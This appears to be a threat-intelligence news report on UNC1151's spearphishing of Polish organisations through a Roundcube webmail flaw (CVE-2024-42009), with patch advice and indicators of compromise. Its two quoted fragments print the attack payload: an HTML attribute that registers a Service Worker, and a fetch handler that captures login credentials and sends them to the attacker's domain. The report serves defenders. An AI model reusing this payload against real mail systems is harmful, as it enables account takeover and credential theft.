UNC1151 Targets Polish Entities via Roundcube Vulnerability in Spearphishing Campaign

A highly targeted spear phishing campaign has struck Polish organizations this week, leveraging a known Roundcube webmail vulnerability (CVE-2024-42009) to compromise user accounts and steal credentials.

The operation, attributed with high confidence to the UNC1151 threat actor cluster linked by Mandiant and Google to Belarusian or Russian intelligence highlights the evolving sophistication of credential theft in modern cyber espionage campaigns.

Exploiting CVE-2024-42009 in Roundcube

The campaign begins with a compelling phishing email, purporting to be an urgent invoice request associated with a reservation number. Simply opening the email in a vulnerable Roundcube installation was sufficient for exploitation no additional user interaction was needed.

CVE-2024-42009 is an HTML sanitization flaw in Roundcube, the popular browser-based email client. This bug allows attackers to smuggle malicious JavaScript into the victim’s browser context via specially crafted email messages.

Since webmail clients like Roundcube must balance the ability to display HTML emails with the need to block dangerous scripting, sanitization routines are critical and, as this campaign shows, often bypassed by new tricks.

Malicious Payload and Credential Theft

The attack’s technical backbone is a two-stage JavaScript payload. Upon exploiting the vulnerability, the attack code first registers a Service Worker on the victim’s browser—a rarely abused browser feature designed for background tasks and offline support, but here weaponized for credential theft.

Initial Exploit: Service Worker Registration

xml<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes; animation-duration: 1s; 
onanimationstart=d=document.querySelector('#attachment-list');if(d)d.style.display='none';n=navigator;
u=d?.querySelector('a').href;if(u)n.serviceWorker.register(u) (...)

This code executes as soon as the email is opened, silently registering a malicious Service Worker that persists in the browser.

Credential Harvesting: Intercepting Login Attempts

jsself.addEventListener('fetch', event => {
  (...)
  if (req.method === 'POST') {
    const cloned = req.clone();
    cloned.text().then(bodyText => {
      const params = new URLSearchParams(bodyText);
      const user = params.get('username') || params.get('_user');
      const pass = params.get('password') || params.get('_pass');
      fetch('https://a.mpk-krakow.pl/creds', {
        body: JSON.stringify({ login: user, password: pass }),
        (...)

After the Service Worker is installed, the victim is redirected to their organization’s legitimate webmail login page.

As users enter their credentials, the malicious Service Worker intercepts the POST request, captures the login data, and exfiltrates it to an attacker-controlled server (a.mpk-krakow[.]pl). This method ensures that attackers get credentials even as the user accesses a real, secure login form.

New Roundcube Vulnerability and Attack Chain Potential

This week also saw the disclosure of CVE-2025-49113, a fresh Roundcube vulnerability enabling authenticated attackers to execute code on the server and potentially take over the entire webmail instance.

While this new flaw has not yet been observed in the wild, CERT Polska warns that combining such server-side vulnerabilities with client-side credential theft could create devastating attack chains first stealing credentials, then pivoting to full server compromise.

Recommendations and Indicators of Compromise

All organizations running Roundcube are urged to:

• Patch to the latest version (1.6.11 or 1.5.10 as of June 2025).
• Review network logs for connections to a.mpk-krakow[.]pl.
• Reset passwords for affected users and verify recent account activity.
• Remove malicious Service Workers via browser developer tools.
• Report incidents to the appropriate national CSIRT.

Key IoCs from this campaign:

• irina.vingriena@gmail[.]com – sender address
• julitaszczepanska38@gmail[.]com – sender address
• 2001:67c:e60:c0c:192:42:116:216 – SMTP sources address
• [!WAZNE] Faktura do numeru rezerwacji: S2500650676 – email subject
• 70cea07c972a30597cda7a1d3cd4cd8f75acad75940ca311a5a2033e6a1dd149, Delivery report – sha256 and name of attached JS file
• a.mpk-krakow[.]pl – credential harvesting domain used by the attacker

This campaign marks a clear escalation in the use of browser-based webmail vulnerabilities combined with advanced phishing and credential-harvesting techniques.

The rapid exploitation of newly discovered flaws now potentially in both client and server contexts underscores the necessity for rapid patching, vigilant monitoring, and coordinated defense among targeted organizations and national CSIRTs.

As threat actors like UNC1151 continue to innovate, the security community must remain agile and informed to defend against the next wave of attacks.